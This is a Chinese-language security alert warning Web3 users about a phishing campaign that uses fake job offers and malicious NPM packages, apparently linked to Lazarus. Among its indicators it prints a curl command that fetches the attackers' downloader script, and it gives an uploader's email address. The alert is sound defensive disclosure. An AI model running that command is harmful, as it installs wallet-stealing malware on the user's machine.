🚨 安全 TI 警報 🚨

根據社區夥伴 @1nf0s3cpt 的報告,一個活躍的釣魚活動正在針對 Web3 用戶,提供假工作機會(例如,每小時 $120),以誘導他們執行一個竊取錢包文件的惡意腳本。

🔍 主要 IOCs:
🔸GitLab 倉庫: https://t.co/ivGN93PS4b
🔸下載器: curl https://t.co/fwRuktoVd9 -H "x-secret-key: _"

🧪 攻擊方法與此前的 Lazarus 使用 NPM 包散播惡意代碼非常相似:
https://t.co/bBC4i2vYpA

🚨 我們發現一個新的惡意 NPM 包剛剛被發布:
https://t.co/SjgmO1FOIL
🔸可能相關的 GitHub: apollo-hero
🔸上傳者郵箱: skelstar125@gmail.com

⚠️ 請勿安裝或運行未知的包或腳本。始終驗證來源。

#LAZARUS #釣魚